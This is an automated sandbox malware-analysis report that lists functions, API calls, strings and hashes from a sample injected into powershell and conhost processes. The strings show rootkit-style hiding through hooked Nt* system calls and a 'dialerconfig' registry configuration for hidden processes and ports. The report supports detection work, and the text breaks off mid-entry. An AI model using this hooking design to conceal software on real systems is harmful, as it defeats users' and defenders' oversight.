Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq$4l$4l
API String ID: 0-1950125027
Opcode ID: 7ea259db35145be6ffe9cba8bb7bf365ab207d5709f444e17c0fa997848539af
Instruction ID: 3d70cb4b8abcaff3967e5895041fe19ae71ed707482e95b8a48f0ac31b1c8d0d
Opcode Fuzzy Hash: 7ea259db35145be6ffe9cba8bb7bf365ab207d5709f444e17c0fa997848539af
Instruction Fuzzy Hash: 89516A37F08305DFDB645A69881867BBFB6EFC5211F14807BD845CB291DA31C945CBA2

Function 04437AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

`kq, xrefs: 04437BEB
tM>l, xrefs: 04437B9C
`kq, xrefs: 04437D0C
`kq, xrefs: 04437C6A
`kq, xrefs: 04437D8A

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID: tM>l$`kq$`kq$`kq$`kq
API String ID: 0-238216489
Opcode ID: 5605fb3f724cc1a5144fc1e2f6eafde85672683018ec0463e92a6370bf916e17
Instruction ID: b0c05213f94b92cfba2a5f7526f3ffa02794a9f74f17b8fcb122d5d0d6022f51
Opcode Fuzzy Hash: 5605fb3f724cc1a5144fc1e2f6eafde85672683018ec0463e92a6370bf916e17
Instruction Fuzzy Hash: C2B1A674E002099FDB54DFA9D980A9EFBF6FF48314F10862AD419AB355EB34A905CF90

Function 04437AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`kq, xrefs: 04437BEB
tM>l, xrefs: 04437B9C
`kq, xrefs: 04437D0C
`kq, xrefs: 04437C6A
`kq, xrefs: 04437D8A

Memory Dump Source

Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4430000_powershell.jbxd

Similarity

API ID:
String ID: tM>l$`kq$`kq$`kq$`kq
API String ID: 0-238216489
Opcode ID: 2f2d128c7749004c77c9c7ae39d0c13e7922b498e082a7ee794bdd51191fb4a0
Instruction ID: 9ed2012c97044bc3c4c842dbcfc5a1e5b52400bf469186582a5f80320241810f
Opcode Fuzzy Hash: 2f2d128c7749004c77c9c7ae39d0c13e7922b498e082a7ee794bdd51191fb4a0
Instruction Fuzzy Hash: 87B19574E002099FDB54DFA9D980A9EFBF6FF48314F10862AD419AB355EB34A905CF90

Function 06FE5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 06FE57F4
$jq, xrefs: 06FE57AA
$jq, xrefs: 06FE57C6
$jq, xrefs: 06FE5800

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: 39450fd458d8faedff91cf936256781dc5e8966c6fe49ee6d2a4b9700ed594eb
Instruction ID: 1bdeaad28a724d301f9e37e9a2bfcd2b918b3a96b43b4e16dd43e7a245af9ef5
Opcode Fuzzy Hash: 39450fd458d8faedff91cf936256781dc5e8966c6fe49ee6d2a4b9700ed594eb
Instruction Fuzzy Hash: 35213732F182049FEBA4596A8840727BFD7ABC1719F24842AD905CB281DD77C941C361

Function 06FE2108 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

J?l, xrefs: 06FE2156
$jq, xrefs: 06FE2166
$jq, xrefs: 06FE2172
J?l, xrefs: 06FE214A

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$J?l$J?l
API String ID: 0-1718209251
Opcode ID: 4f6133fa23d6e069eebe0f9baf25006f8014c6199d4fbc0aba26e02ba2080f79
Instruction ID: b651465812121d0c646adf386287c630e5e502e82aa5cd087d53f8527d5f7386
Opcode Fuzzy Hash: 4f6133fa23d6e069eebe0f9baf25006f8014c6199d4fbc0aba26e02ba2080f79
Instruction Fuzzy Hash: DF014726E0E3804FC32202580C115933FBEDFC2510B1A45D7D990AB267D82E8E06C3A2

Function 06FE0308 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06FE037F
$jq, xrefs: 06FE0352
4'jq, xrefs: 06FE0373
$jq, xrefs: 06FE035E

Memory Dump Source

Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: e9bbad06d4d3df71e8eff6605e1bdd11a5a1d69ab0152d1d98287a1b7bc07838
Instruction ID: 1670a801d55517cd999b19263547db6bb9a528b2a3a7ed9ad8ae78169f1201bd
Opcode Fuzzy Hash: e9bbad06d4d3df71e8eff6605e1bdd11a5a1d69ab0152d1d98287a1b7bc07838
Instruction Fuzzy Hash: 66012621B4D3954FD36A022818316AAAFB79FC3510B2A40EBC881DF393CD684D15C7AB

Analysis Process: conhost.exePID: 1372, Parent PID: 348COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	2

Executed Functions

Function 0000019A4980328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000019A498032AE
PathFindFileNameW.SHLWAPI ref: 0000019A498032BD

Part of subcall function 0000019A49803844: StrCmpNIW.SHLWAPI ref: 0000019A4980385C

Part of subcall function 0000019A49803790: GetModuleHandleW.KERNEL32 ref: 0000019A4980379E
Part of subcall function 0000019A49803790: GetCurrentProcess.KERNEL32 ref: 0000019A498037CC
Part of subcall function 0000019A49803790: VirtualProtectEx.KERNEL32 ref: 0000019A498037EE
Part of subcall function 0000019A49803790: GetCurrentProcess.KERNEL32 ref: 0000019A49803809
Part of subcall function 0000019A49803790: VirtualProtectEx.KERNEL32 ref: 0000019A4980382A

CreateThread.KERNEL32 ref: 0000019A4980330B

Part of subcall function 0000019A49801D14: GetCurrentThread.KERNEL32 ref: 0000019A49801D1F

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: dde57f2258e09cee01642a887e0e5d641ef90779c87b0062cd588f70ff96c3bb
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 7011A13061020282F7649B29F8B57D92294BFD4F44FCE412A994683591EFF8C07C83C3

Function 0000019A49801ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000019A49801628: GetProcessHeap.KERNEL32 ref: 0000019A49801633
Part of subcall function 0000019A49801628: HeapAlloc.KERNEL32 ref: 0000019A49801642
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498016B2
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498016DF
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498016F9
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801719
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801734
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801754
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A4980176F
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A4980178F
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498017AA
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A498017CA

Sleep.KERNEL32 ref: 0000019A49801AD7
SleepEx.KERNELBASE ref: 0000019A49801ADD

Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498017E5
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801805
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801820
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A49801840
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A4980185B
Part of subcall function 0000019A49801628: RegOpenKeyExW.ADVAPI32 ref: 0000019A4980187B
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A49801896
Part of subcall function 0000019A49801628: RegCloseKey.ADVAPI32 ref: 0000019A498018A0

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: b600031d3329a55e4df002e5a073c9957e2814a8dd9cbce4073cf2a61d3f919c
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: E931303120160155FF509F2EDA717E913A4AFC4FE0F8D54219E0987295EF94C879C393

Function 0000019A497D273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000019A497D285E

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: ffd38c940bb3e8c7b7636590f0ed4d1b8b1c68e097bce8cb2b2aeb7eeb9278c0
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 8F610132B0169087EB548F1590607ADB3A2FB94FA4F9C8221DF5D27788DA78D877C781

Non-executed Functions

Function 0000019A49802B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000019A49802BD0
lstrlenW.KERNEL32 ref: 0000019A49802E0A

Part of subcall function 0000019A4980199C: OpenProcess.KERNEL32 ref: 0000019A498019C2
Part of subcall function 0000019A4980199C: K32GetModuleFileNameExW.KERNEL32 ref: 0000019A498019E0
Part of subcall function 0000019A4980199C: PathFindFileNameW.SHLWAPI ref: 0000019A498019EF
Part of subcall function 0000019A4980199C: lstrlenW.KERNEL32 ref: 0000019A498019FB
Part of subcall function 0000019A4980199C: StrCpyW.SHLWAPI ref: 0000019A49801A0E
Part of subcall function 0000019A4980199C: CloseHandle.KERNEL32 ref: 0000019A49801A1C

GetProcAddress.KERNEL32 ref: 0000019A49802BE5

Part of subcall function 0000019A4980152C: StrCmpIW.SHLWAPI ref: 0000019A4980155D

Part of subcall function 0000019A49803844: StrCmpNIW.SHLWAPI ref: 0000019A4980385C

StrCmpNIW.SHLWAPI ref: 0000019A49802C28
lstrlenW.KERNEL32 ref: 0000019A49802D50

Strings

NtQueryObject, xrefs: 0000019A49802BDB
ntdll.dll, xrefs: 0000019A49802BC9
\Device\Nsi, xrefs: 0000019A49802C1B

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 214dbd209c19ea4beb045b5d8d128529ff69c00b1d6f2a27e0d487b295368070
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 92B19B32210A5486EB688F29D4607E967A4FF84F94F8A5016EE4953795DBF4CCA8C3C3

Function 0000019A49807D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000019A49807DAC
RtlCaptureContext.NTDLL ref: 0000019A49807DD9
RtlLookupFunctionEntry.NTDLL ref: 0000019A49807DF3
RtlVirtualUnwind.NTDLL ref: 0000019A49807E34
IsDebuggerPresent.KERNEL32 ref: 0000019A49807E88
SetUnhandledExceptionFilter.KERNEL32 ref: 0000019A49807EA9
UnhandledExceptionFilter.KERNEL32 ref: 0000019A49807EB4

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 7e9eb21ec22594ff17cbccae9e2aac58471280ecdde8af57f0b49c4fd349ee9d
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: D5316172205B8489EB609F64E8503ED7360FBC4B44F884029DB8D47B98EF78C95CC752

Function 0000019A4980D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000019A4980D31D
RtlLookupFunctionEntry.NTDLL ref: 0000019A4980D335
RtlVirtualUnwind.NTDLL ref: 0000019A4980D370
IsDebuggerPresent.KERNEL32 ref: 0000019A4980D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 0000019A4980D3B3
UnhandledExceptionFilter.KERNEL32 ref: 0000019A4980D3BE

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 31f64e0c1fbe57bf9b5fcf7e919071de1fb5ed6862fe9d7a7163a1350efb7bbb
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 92318832214F8085DB60CF29E8513DE73A4FBC9B54F950129EA9D43B54DF78C569CB82

Function 0000019A49807960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000019A4980798C
GetCurrentThreadId.KERNEL32 ref: 0000019A4980799A
GetCurrentProcessId.KERNEL32 ref: 0000019A498079A6
QueryPerformanceCounter.KERNEL32 ref: 0000019A498079B6

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: ab9ce0ad891cf8bc81c54c6378d507aa36de6b2658ada06a3047d4a52364b745
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: E2112132714F0189EB00CF64E8653A833A4F759B58F880D21DA6D877A4DBB8C5A883C1

Function 0000019A49801BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019A49801C2D
HeapAlloc.KERNEL32 ref: 0000019A49801C3B
GetProcessHeap.KERNEL32 ref: 0000019A49801C77
HeapFree.KERNEL32 ref: 0000019A49801C85

Part of subcall function 0000019A4980152C: StrCmpIW.SHLWAPI ref: 0000019A4980155D

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: c059638013e607724c5f999c9c35c5bb00cda8a91e5cc2a4aa3d8156121c4046
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 8711C135701B4481EA04CF6AA4586A973A0FFC9FD0F8D4028CE8D43765DFB8C866C382

Function 0000019A4980DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
Instruction ID: ee5dcea4d92b1cb10f63190bd724da8d84a171ec4e7c569a4c42667e4d8e416e
Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
Instruction Fuzzy Hash: F851053270078089FB20DB7AA8547DE7BA1FB80F94F598114EE9867B99DB78C425C742

Function 0000019A497E36F0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
Instruction ID: 9aa004327c0c10178f2e00080e97c926fa3cfad0397867f5d5c5fd0c47b32502
Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
Instruction Fuzzy Hash: 81F062B37142958FDBE88F28E85275A77E1F788780FD48019D68983B08D27C8074CF59

Function 0000019A49801628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000019A49801633
HeapAlloc.KERNEL32 ref: 0000019A49801642

Part of subcall function 0000019A49801268: GetProcessHeap.KERNEL32 ref: 0000019A4980126E
Part of subcall function 0000019A49801268: HeapAlloc.KERNEL32 ref: 0000019A4980127D
Part of subcall function 0000019A49801268: GetProcessHeap.KERNEL32 ref: 0000019A49801297
Part of subcall function 0000019A49801268: HeapAlloc.KERNEL32 ref: 0000019A498012A8

RegOpenKeyExW.ADVAPI32 ref: 0000019A498016B2
RegOpenKeyExW.ADVAPI32 ref: 0000019A498016DF
RegCloseKey.ADVAPI32 ref: 0000019A498016F9
RegOpenKeyExW.ADVAPI32 ref: 0000019A49801719
RegCloseKey.ADVAPI32 ref: 0000019A49801734
RegOpenKeyExW.ADVAPI32 ref: 0000019A49801754
RegCloseKey.ADVAPI32 ref: 0000019A4980176F
RegOpenKeyExW.ADVAPI32 ref: 0000019A4980178F
RegCloseKey.ADVAPI32 ref: 0000019A498017AA
RegOpenKeyExW.ADVAPI32 ref: 0000019A498017CA
RegCloseKey.ADVAPI32 ref: 0000019A498017E5
RegOpenKeyExW.ADVAPI32 ref: 0000019A49801805
RegCloseKey.ADVAPI32 ref: 0000019A49801820
RegOpenKeyExW.ADVAPI32 ref: 0000019A49801840
RegCloseKey.ADVAPI32 ref: 0000019A4980185B
RegOpenKeyExW.ADVAPI32 ref: 0000019A4980187B
RegCloseKey.ADVAPI32 ref: 0000019A49801896
RegCloseKey.ADVAPI32 ref: 0000019A498018A0

Part of subcall function 0000019A498012BC: RegQueryInfoKeyW.ADVAPI32 ref: 0000019A49801319
Part of subcall function 0000019A498012BC: GetProcessHeap.KERNEL32 ref: 0000019A49801327
Part of subcall function 0000019A498012BC: HeapAlloc.KERNEL32 ref: 0000019A49801338
Part of subcall function 0000019A498012BC: RegEnumValueW.ADVAPI32 ref: 0000019A49801397
Part of subcall function 0000019A498012BC: GetProcessHeap.KERNEL32 ref: 0000019A498013DF
Part of subcall function 0000019A498012BC: HeapAlloc.KERNEL32 ref: 0000019A498013ED
Part of subcall function 0000019A498012BC: GetProcessHeap.KERNEL32 ref: 0000019A4980140A
Part of subcall function 0000019A498012BC: HeapFree.KERNEL32 ref: 0000019A49801418
Part of subcall function 0000019A498012BC: lstrlenW.KERNEL32 ref: 0000019A49801421
Part of subcall function 0000019A498012BC: GetProcessHeap.KERNEL32 ref: 0000019A4980142F
Part of subcall function 0000019A498012BC: HeapAlloc.KERNEL32 ref: 0000019A4980143D

Strings

startup, xrefs: 0000019A498016D5
service_names, xrefs: 0000019A498017C3
udp, xrefs: 0000019A49801874
pid, xrefs: 0000019A49801712
paths, xrefs: 0000019A49801788
tcp_local, xrefs: 0000019A498017FE
SOFTWARE\dialerconfig, xrefs: 0000019A49801692
process_names, xrefs: 0000019A4980174D
tcp_remote, xrefs: 0000019A49801839

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 461a903773e2140aa947bf022ece9a526d507e60cac8109777be68f120900551
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 4471DB36310A1086EB10DF69E8A1AD93364FBC4F98F891111DD8E97B69DF78C568C7C2

Function 0000019A498012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000019A49801319
GetProcessHeap.KERNEL32 ref: 0000019A49801327
HeapAlloc.KERNEL32 ref: 0000019A49801338
RegEnumValueW.ADVAPI32 ref: 0000019A49801397

Part of subcall function 0000019A4980152C: StrCmpIW.SHLWAPI ref: 0000019A4980155D

GetProcessHeap.KERNEL32 ref: 0000019A498013DF
HeapAlloc.KERNEL32 ref: 0000019A498013ED
GetProcessHeap.KERNEL32 ref: 0000019A4980140A
HeapFree.KERNEL32 ref: 0000019A49801418
lstrlenW.KERNEL32 ref: 0000019A49801421
GetProcessHeap.KERNEL32 ref: 0000019A4980142F
HeapAlloc.KERNEL32 ref: 0000019A4980143D
StrCpyW.SHLWAPI ref: 0000019A4980145F
GetProcessHeap.KERNEL32 ref: 0000019A49801476
HeapFree.KERNEL32 ref: 0000019A49801484

Strings

d, xrefs: 0000019A4980135A

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: c875e840d2e736cbc30be7cf95321ba14b17b0493c25330a098fafb3b702f81e
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 65519032200B8486EB54CF66E45539E77A1FBC9F95F894124DE8907728DFBCC469C782

Function 0000019A49801D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000019A49801D1F

Part of subcall function 0000019A49801FD4: GetModuleHandleA.KERNEL32 ref: 0000019A49801FEC
Part of subcall function 0000019A49801FD4: GetProcAddress.KERNEL32 ref: 0000019A49801FFD

Part of subcall function 0000019A49805B30: GetCurrentThreadId.KERNEL32 ref: 0000019A49805B6B

Strings

ntdll.dll, xrefs: 0000019A49801D2D
sechost.dll, xrefs: 0000019A49801E39
NtQueryDirectoryFileEx, xrefs: 0000019A49801D9C
NtDeviceIoControlFile, xrefs: 0000019A49801E56
NtEnumerateKey, xrefs: 0000019A49801DB9
NtQuerySystemInformation, xrefs: 0000019A49801D45
NtEnumerateValueKey, xrefs: 0000019A49801DD6
NtQueryDirectoryFile, xrefs: 0000019A49801D7F
EnumServicesStatusExW, xrefs: 0000019A49801E11, 0000019A49801E32
NtResumeThread, xrefs: 0000019A49801D62
advapi32.dll, xrefs: 0000019A49801DF7, 0000019A49801E18
EnumServiceGroupW, xrefs: 0000019A49801DF0

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 31d579ad6bb9645da41cf41c3be2aafd96578bafb4fad4f0cc707521ce8e8f02
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: B8317E75100A5AA0EA04EF6DE872BD46321BFD4F54FCA5413980A175669FFC82ADC3D3

Function 0000019A497D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000019A497D6938
__scrt_acquire_startup_lock.LIBCMT ref: 0000019A497D698A
_RTC_Initialize.LIBCMT ref: 0000019A497D69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000019A497D69DE
__scrt_release_startup_lock.LIBCMT ref: 0000019A497D6A09

Strings

scriptor', xrefs: 0000019A497D6B39, 0000019A497D6BB2, 0000019A497D6BEC
`eh vector copy constructor iterator', xrefs: 0000019A497D6A3B
`dynamic initializer for ', xrefs: 0000019A497D69C7
`eh vector vbase copy constructor iterator', xrefs: 0000019A497D69EE

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

